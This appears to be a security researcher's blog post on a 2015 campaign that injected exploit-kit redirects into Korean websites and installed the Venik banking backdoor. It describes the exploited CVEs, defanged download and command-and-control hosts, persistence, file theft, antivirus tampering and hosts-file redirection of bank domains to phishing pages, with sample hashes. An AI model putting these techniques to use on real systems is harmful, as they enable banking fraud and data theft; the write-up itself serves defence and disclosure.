We looked at our logs for this year and found more Korean websites infected:

  • koreatimes.com (Sep. 18, 2015)
  • filehon.com(May 30, 2015)
  • joara.com (May 3, 2015)
  • hometax.go.kr (May 3, 2015)
  • soriaudio.co.kr (April 23, 2015)
  • gomsee.com (March 16, 2015)
  • lottoplay.co.kr (Feb 6, 2015)
  • insight.co.kr (Jan 31, 2015)
  • filecity.co.kr (Jan 23, 2015)
  • nggol.com(Jan 6, 2015)
  • koreamanse.com(Jan 6, 2015)


The payload we got also specifically targets Korean banks by modifying the infected systems hosts file to redirect traffic from Korean banks to its controlled server. This means the attacker can craft a phishing website without the user knowing it is visiting a phishing site. It also targets Ahnlab by killing processes and deleting files specific to the software. Ahnlab is a popular antivirus software in South Korea.

KoreanSitesInfection (2)

                                                              Infection Flow



Website Infection

This following analysis will focus on the infection that took place in koreatimes.com

The culprit is a javascript file named “2013_gnb.js” which is an iframe injector leading to KaiXin EK landing page.



It exploits the following vulnerabilities:

  • CVE-2014-6332 (IE)
  • CVE-2011-3544 (Java)
  • CVE-2015-0336 (flash)


We found interesting strings on the flash file which gives us an idea about the attackers platform on building its exploit and references to the attacker. Also an interesting string “King Lich V” was found on the flash file which  is likely the author’s signature. That string was found also found in other attacks involving Chinese group. Flash file was also packed using DoSWF.



Once the exploitation is successful, it has two options to execute its payload.  If it is running in Windows 7 or 8, it will fire a powershell script that will download an executable file from 199[.]188[.]106[.]161.



Else, it executes a shellcode that downloads from “www[.]jfkdsajfk5263[.]com/server[.]jpg”. The former was basically used to bypass DEP

The binary downloaded is a banking malware with backdoor capabilities under the family of Venik.


Backdoor Venik

“Venik” is a Russian word for a besom, or broom, used in Russian bathhouses.

The binary downloaded is actually dropper which when executed installs a dll file in C:\{random} folder using random name like “c:\tqcsv\krxxc.rxk”. It executes this dll as:

  • “%system32%\rundll32.exe” “c:\tqcsv\krxxc.rxk”,Start


Creates mutex (M142.0.137.66:3201) and creates autostart key entry such as:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    • EvtMgr – “c:\windows\system32\rundll32.exe “c:\tqcsv\krxxc.rxk”,Start”

After installation, it beacons out to its server by contacting the following urls:

  • http://142[.]0[.]137[.]68:803
  • http://142[.]0[.]137[.]67:805/index.php

It also opens a connection to using TCP port  3201 and waits for a command from the server. The server can issue a command that starts a remote access service from the infected client.



It also collects files from %ProgramFiles% folder and mapped drives. It copies the files to a random file in C:\ using xcopy  and uploads the file to its server using an HTTP session.


It modifies the hosts file (%system32%\drivers\etc\hosts) and adds the following lines. It effectively redirects the users visit of banking sites to a site controlled by the attacker which is actually a phishing site: www.shinhan.com.or search.daum.net search.naver.com www.kbstar.com.or www.knbank.vo.kr openbank.cu.vo.kr www.busanbank.vo.kr www.nonghyup.com.or www.shinhan.ccm www.wooribank.com.or www.hanabank.ccm www.epostbank.go.kr.or www.ibk.co.kr.or www.ibk.vo.kr www.keb.co.kr.or www.kfcc.co.kr.or www.lottirich.co.ir www.nlotto.co.ir www.gmarket.net nate.com www.nate.com daum.com www.daum.net daum.net www.zum.com zum.com naver.com www.nonghyup.com www.naver.com www.nate.net hanmail.net www.hanmail.net www.hanacbs.com www.kfcc.co.kr www.kfcc.vo.kr www.daum.net daum.net www.kbstir.com www.nonghuyp.com www.shinhon.com www.wooribank.com www.ibk.co.kr www.epostbenk.go.kr www.keb.co.kr www.citibank.co.kr.or www.citibank.vo.kr www.standardchartered.co.kr.or www.standardchartered.vo.kr www.suhyup-bank.com.or www.suhyup-bank.com www.kjbank.com.or www.kjbank.com openbank.cu.co.kr.or openbank.cu.co.kr www.knbank.co.kr.or www.knbank.co.kr www.busanbank.co.kr.or www.busanbank.co.ir www.suhyup-bank.com www.suhyup-bank.ccm www.standardchartered.co.kr

                               Host File Modification

The phishing site asks for sensitive information that are not usually ask during a normal online banking session. 



There are also times that it will ask the user to visit other banking sites leading to phishing sites. This happens when it is likely that the phishing site does not currently support a bank.



Adding to its attack on Korean related services, it tries to disable Ahnlab related files and process. Ahnlab is a popular antivirus software in South Korea.



As of September 25, we verified that koreatimes.com is clean from this infection.

Related Samples

Venik Dropper c242d641d9432f611360db36f2075f67
Packer UPX
Filename 66.exe


Venik DLL a6ec0fbe1ad821a3fb527f39e180e378
Packer RLPack
Filename {random}


Flash Exploit b9a5a00e134fe0df217c01145319b1cb
Packer DoSWF
Filename ad.swf



Credits to Alex Burt for his help in discovery of this  infection.